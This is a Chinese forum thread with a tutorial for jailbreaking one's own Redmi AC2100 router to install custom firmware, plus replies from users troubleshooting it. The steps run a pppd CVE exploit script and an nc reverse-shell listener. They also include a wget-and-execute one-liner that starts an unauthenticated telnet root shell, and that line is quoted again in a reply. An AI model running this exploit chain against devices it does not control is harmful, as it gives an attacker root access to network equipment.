红米AC2100刷机自动&手动!

Guaniu · 发表于 2020-5-1 16:13

本帖最后由 Guaniu 于 2020-5-2 11:56 编辑

上传不了附件就不上传啊，你们可以去下
https://www.right.com.cn/forum/thread-4016985-1-1.html 的包！

手动是当自动没有反弹的时候使用！能反就不要用这个了，没图教程，灵魂学习~

感谢我群老哥lework 1003877216改的循环pppd-cve.py

手动时使用pppd-cve.py替换redmi文件来下pppd-cve.py

解压出来的rm2100文件夹要放到桌面，你不放到桌面你就在在CMD里用命令进入到rm2100目录里，才能运行下面的命令！

打开4个CMD
然后4个全输入cd C:\Users\Administrator\Desktop\rm2100 来到刷机rm2100文件夹里面！

然后第一个窗口输入python.exe redmi\PPPoE_Simulator.py
第二个输入python.exe -m http.server 8081
第三个输入入nc.exe -nvlp 31337
然后就进路由器，拔号断开，然后再点拔好，直到那里显示连接成功！

第四个就输入python.exe redmi\pppd-cve.py

等待第三个监视里出现IP信息！

然后在第三个CMD命令窗口里输入
cd /tmp&&wget http://192.168.31.177:8081/busybox&&chmod a+x ./busybox&&./busybox telnetd -l /bin/sh

等等命令完成，弹出shell窗口！

shell窗口输入命令
wget http://192.168.31.177:8081/r3g.bin&&nvram set uart_en=1&&nvram set bootdelay=5&&nvram set flag_try_sys1_failed=1&&nvram commit
mtd -r write r3g.bin kernel1

等待完成！

先更改本地连接IP地址为192.168.1.X网段，255.255.255.0 网关192.168.1.1

然后用WINscp 连接192.168.1.1，协议是SCP，账号：root 密码：admin

然后上最上面的三点，切到主目录后，选择tmp文件夹，放进固件redmi.trx

完成后再打开putty打开192.168.1.1，账号：root 密码：admin

然后出出现的OP窗口里执行
mtd -r write /tmp/redmi.trx kernel

等待完成！

本地连接设为自动获取IP！

就可以通过192.168.2.1 账号：root 密码：admin 进入路由设置页面！

alexsybil · 发表于 2020-5-1 16:41

果然是灵魂学习，如果不是自己原先失败过好多次根本看不懂。我都快放弃了，这次能不能成功啊

jzhf · 发表于 2020-5-1 17:03

其实按照视频老老实实刷啥事没有……

Guaniu · 发表于 2020-5-1 17:04

jzhf 发表于 2020-5-1 17:03
其实按照视频老老实实刷啥事没有……

懒得装虚拟机！

alexsybil · 发表于 2020-5-1 17:07

惊喜，终于在nc监听界面出现了ip地址.但是在第三个cmd窗口输入相关命令,显示找不到路径。
另外，楼主应该在教程里面加上一段话，就是必须把原来的redmi文件夹解压到桌面才行。要不然你的四个cmd命令都无效的，小小小白看不懂

wyolt · 发表于 2020-5-1 17:11

感谢大神！

qq362203 · 发表于 2020-5-1 17:21

618准备购买ac2100,已经添加到购物车里了

Guaniu · 发表于 2020-5-1 17:25

alexsybil 发表于 2020-5-1 17:07
惊喜，终于在nc监听界面出现了ip地址.但是在第三个cmd窗口输入相关命令,显示找不到路径。
另外，楼主应该 ...

谢谢，我忘了之前还记得要写的！

alexsybil · 发表于 2020-5-1 17:30

Guaniu 发表于 2020-5-1 17:25
谢谢，我忘了之前还记得要写的！

我发现这简直是TMD撞大运。我第一次运行的时候，程序发了十个包左右就被监听到了，只是输入cd /tmp&&wget http://192.168.31.177:8081/busybox&&chmod a+x ./busybox&&./busybox telnetd -l /bin/sh显示找不到路径；
第二次运行的时候，程序发包发了至少六七十个，一次都没有被监视到。真心受不了了。
隔壁的虚拟机我也尝试了，失败。
为了这台破路由，我已经花了三十个小时左右在，昨晚还熬夜到三点，我也奥疯了

Guaniu · 发表于 2020-5-1 17:44

alexsybil 发表于 2020-5-1 17:30
我发现这简直是TMD撞大运。我第一次运行的时候，程序发了十个包左右就被监听到了，只是输入cd /tmp&&wget ...

你是不是路由器的IP没有设成192.168.31.1

CMOS · 发表于 2020-5-1 17:53

请教一下大佬…这是啥情况啊？

CMOS · 发表于 2020-5-1 17:53

CMOS 发表于 2020-5-1 17:53
请教一下大佬…这是啥情况啊？

我的 cd的位置自己改过了

Guaniu · 发表于 2020-5-1 19:13

CMOS 发表于 2020-5-1 17:53
我的 cd的位置自己改过了

你只要把那个WIN的一键解压出来的re2100这个文件夹放到桌面就可以用了！

Guaniu · 发表于 2020-5-1 19:14

CMOS 发表于 2020-5-1 17:53
我的 cd的位置自己改过了

位置不要带中文名称试试！

CMOS · 发表于 2020-5-1 19:24

Guaniu 发表于 2020-5-1 19:13
你只要把那个WIN的一键解压出来的re2100这个文件夹放到桌面就可以用了！

感觉不是位置得问题诶…

账号		自动登录	找回密码
密码			立即注册

[AC2100(RM2100)] 红米AC2100刷机自动&手动!

本帖子中包含更多资源

点评

评分

相关帖子

点评

点评

点评

点评

点评

点评

本帖子中包含更多资源

点评

点评